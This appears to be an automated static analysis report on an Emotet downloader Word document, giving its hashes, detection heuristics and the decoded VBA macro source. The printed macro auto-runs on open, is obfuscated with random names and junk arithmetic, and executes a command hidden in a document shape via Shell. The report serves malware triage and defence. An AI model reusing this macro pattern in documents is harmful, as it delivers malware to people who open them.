Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d567010c93cb4f0b…

MALICIOUS

Office (OLE)

Size: 137.6 KB
Created: 2018-12-11 09:22:00
Authoring application: Microsoft Office Word
First seen: 2019-08-04
MD5: 7d923847971a1e74e12c99653e114647
SHA-1: eb10fc082251b12072ea2c1ae7123393bf36d447
SHA-256: d567010c93cb4f0b1100e00abd90e1e911ec246262cd0bec5716078ad4cbd843
Risk score: 252

Heuristics (9)

  • ClamAV: Doc.Downloader.Emotet-6899225-0 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6899225-0
  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS, 3 related findings)
    Document contains VBA macro code
  • Potential Shell call in VBA (severity: critical, rule: OLE_VBA_SHELL)
    Potential Shell call in VBA
    Matched line in script:
     _
    .Shell(iihfU, jChzFM), YXtwPRj)
       zISRQFrULdSlRZslbHilSOH = (242593722 + Round(JQShbkjFrQbBbDLOHUzGfIij) * 293021783 - wzNckBhRGpZmksijaIRjzE + (WLtHiUAhmpmlmrPjaU / Tan(zWpVkGXwiZOJouar)))
  • VBA p-code auto-exec with execution tokens (severity: high, rule: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro (severity: low, rule: OLE_VBA_AUTOOPEN)
    AutoOpen macro
    Matched line in script:
    Attribute VB_Customizable = True
    Sub autoopen()
    shdSmRDc
  • Suspicious cmd.exe invocation with execution flag (severity: high, rule: SC_STR_CMD)
    Suspicious cmd.exe invocation with execution flag
  • Legacy WordBasic auto-exec macro marker (severity: medium, rule: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact (severity: info, rule: EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (severity: info, rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4597 bytes
SHA-256: 265c9cf6c22a1e817af8fb92d806ed1d2511ba9fd43d6a92fe07a15d49daa20c
Detection: ClamAV: No threats found
Obfuscation or payload: likely. 131 of 160 identifiers look randomly generated (e.g. 'jkpfXDfWtbhToiVjAlXpVfYZ'), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "vTqErLCw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
shdSmRDc
End Sub

Attribute VB_Name = "HCHMtlFZj"
Function shdSmRDc()
On Error Resume Next
   AwiaUizEQnGwuztfOmAWk = (205715811 + Round(YiUHYCTXluwdrGnN) * 155653977 - ZzunzzRvzVKSqAVlKr + (WbCzPVDwUCYbYdBKfQklXpcC / Tan(MSDvHFwwOAuXCiSuzztbtlpp)))
qVZGchwzzDCzCMwcfKcGmd = 250163150
   EbnPRFYTtcAzfjwIkt = (191263656 + Round(TchIDOBwpiAsqJAIAz) * 147476688 - qukbcbOitdSdwRDbtfLCDZd + (cIHWinIkXmiZsFfb / Tan(XFMPXvZGYPVoUn)))
QZzUUsvFUiGKmijnz = 236723661
   LOaKBwbGlcpzQfC = (28994865 + Round(PahdfAHzrIzpkt) * 166389160 - DXonYFSciduFcI + (uqMqOqffOSLKncQ / Tan(jQwMHNRbJIEuBF)))
WiCEzXDKMYsaVN = 312670286
   nDwbiEnzHzHzcwGcfwi = (336938489 + Round(SiAjasQTTcNpBaRRFsD) * 71886539 - UwqJBYPzJKSIwUUzvDMXjoWt + (aVoLaGioiwmJXYTA / Tan(JRvjDFzTKornQjazzb)))
anjEnUUWioYfsX = 78080880
   iriKFtWvwYscwcbjW = (322803382 + Round(FJGwPwnhMnYVPi) * 170113639 - zcKXmjwTkwDCobYNEJ + (FXuPLSLKIaCcwWIiELZ / Tan(WLnMSuktkOKRGCUzC)))
wEaYpshUFjfzTCir = 35725263
   zSPASNXHPvYhHOfzGjrS = (7228865 + Round(MRvRHZSAMDIOThENCqpz) * 234944177 - NISwJRdVUWdVFwF + (FwpPiVZsuwvsdA / Tan(BuHEmwJPAXqilkwbGHBl)))
JUXsiZELVksTsbbwtSCwjp = 289355865
   ZNobvoUzQrksPJnLDU = (212195589 + Round(SJuNZNGYuhbZCdaRGfroRj) * 118303093 - STJLdVlJMNBPSaCihvDiQLp + (jVFXcsZjrzuGDuvYwSMpbK / Tan(fdJGVfjiHdXcIPOjUoSXTfvi)))
AimwwAKYWZtTlDDIVncfSm = 59078559
Set zdXQr = vTqErLCw.Shapes(flIwQE + "GFtELIoGcL" + VzVDm)
   iwnjQwpzHvwRjXMD = (225928437 + Round(tiSSlVLCwdYizRv) * 311475531 - fqMmmkZKcwMZhCCZ + (vvtPLSVNBMZZwhWoMjM / Tan(WGwtHIYwdObWIYVzBv)))
XrYkXAljPplVWpEEpw = 1816059
   ZGTWHmbkNtujWM = (21398115 + Round(UkduKJJXowCSFqsnvfiN) * 84010373 - uAqtIuDGaHGYzObPpQwv + (LkJfWAGlripSoqcERAOTh / Tan(uLhtiLfpNQQwjQjNlu)))
VjYQFJXwKXPicAppzwdVuFBU = 167718962
Const jChzFM = 0
   mupJWHcFOLlmSqXB = (260608324 + Round(nEidNUiJvnKBGqbDwZbCfqOH) * 307959119 - KAYqYKwIcWcJhViNMovNFuKO + (wZkTwqbiNJdkEPACzOFbosG / Tan(RiZMhuPqKwakNpfjAbT)))
AcHZuLHjEmDGTMBR = 110697699
   kNOrOatGsIQDwrAitWAbDM = (127372426 + Round(YqsXmBkpsfwfsSwEcrLhOjF) * 128568140 - oQmjnnYtUTXhVT + (XbLSuVlbawzMAlfplZUwkwI / Tan(sYlYzYWHXUKnXmY)))
DpLkobXIodlIBVGZSGaWk = 82873495
   XwtYDzCraoPYrdKMwAwWQlRE = (326469995 + Round(IzGtwPYqHkjjYicuHdjTPCpa) * 175837405 - bjflhobGqEkhsAABVafMbSt + (ioVdiGIjSBooKWDsIS / Tan(YJaliTNhPuOTIqJGtSzYkw)))
OrMMrzXnDIiUMD = 18122610
   WrNsNkooFuTvEREYRqahw = (323795048 + Round(iJqHjtQLVfwizqaDCz) * 204040167 - UmswCzzbXHDlZXiiXcHvpiw + (GiEiqnXiTCzvQrFjv / Tan(nNcMJcLsjZrjFlocrTsPlk)))
USWXjRfXYzBvknuZcXwGw = 280417084
iihfU = zdXQr.TextFrame.TextRange + pWzRVn + iZaNY + tnaFpQ + XvTRBnN + zzfMph + ZARNCCk + MuRzfjKC + VznVV + oXdJmUPn
   dwtKtGIcbJKzHdYPC = (10106445 + Round(zraZJklDaFMrQiM) * 242092869 - QasaXstpTFNAviTPiPXCXkZ + (ChXORuOusfzcIia / Tan(jkpfXDfWtbhToiVjAlXpVfYZ)))
SHPjrHEpZVmuujzCBVpMvGJ = 65188653
   iKYhsXPDCNwsfQMAanKn = (102804067 + Round(aZwThRwQiUOcYLoOHA) * 335624877 - NXsHounXBNvIPJjwjZqzH + (iiiDrBLLfJofHDhrimdZOV / Tan(FMPcqfiKBcasOclDmLp)))
lUjCjRsvDUhXJFYqbZVjz = 339000062
   AtDVwmczJRKKkoFb = (319978975 + Round(AsvfOcjOJpfXFiaIXHHa) * 217294863 - zCAOiNLCzIKwuJQUfalkdm + (lLbjbQwUWwMvtfAuVC / Tan(rXNIoRsCbjowKKh)))
CGdjmzonwhOWpfjPi = 153367847
   UIPSDEaTruvEhWYGPazK = (90784784 + Round(EWXvBmWViwodAFcuwAju) * 331417452 - CfOOUwEOIXQpDsv + (CozVPwQEWTiVizi / Tan(jzUrjmSXQQqQMKBkwn)))
rzcsFPJsAUjkLtzJGXDbQVZF = 335054692
   RrzahVVjzIrdCtszJVmkj = (167165372 + Round(sIGAWUAFqNdiVAfjt) * 95481615 - HodwcMmGdshkCrZF + (aVwPzCAQYPWzilsVS / Tan(dOMinkOWNJcbmvvMJ)))
PwKlcjDzQIzGoOjZvqG = 311681421
sLRuWqAmV = Array(EPcWu, DhjiWP, uMvMh, Interaction _
 _
 _
 _
 _
 _
 _
 _
.Shell(iihfU, jChzFM), YXtwPRj)
   zISRQFrULdSlRZslbHilSOH = (242593722 + Round(JQShbkjFrQbBbDLOHUzGfIij) * 293021783 - wzNckBhRGpZmksijaIRjzE + (WLtHiUAhmpmlmrPjaU / Tan(zWpVkGXwiZOJouar)))
qtCzFHnwzGwpKcrPq = 45135014
   jEviACkNWMKNZVUFoYmUbCp = (7215191 + Round(GtmInffoAjudzRXUwdJFTUPk) * 25855011 - ijuSjPuitIwFjhfZZoZbqG + (zcZfvcliBEAwwuhAi / Tan(PYOVtucauvaLcvbUupGjw)))
HizBikifrousbiA = 194752238
   LRCAaXmpVNtkOrp = (208016152 + Round(qrNzHWtBfINpPdcGXIz) * 305202819 - ktaPsUjkYbaHVCNHHDuI + (uPZzGjQirjqltFwmjPCKRHjn / Tan(taPwPEFlhpdBQllTFhrkW)))
zOUYnrwjnimRMIAjbfk = 339839145
End Function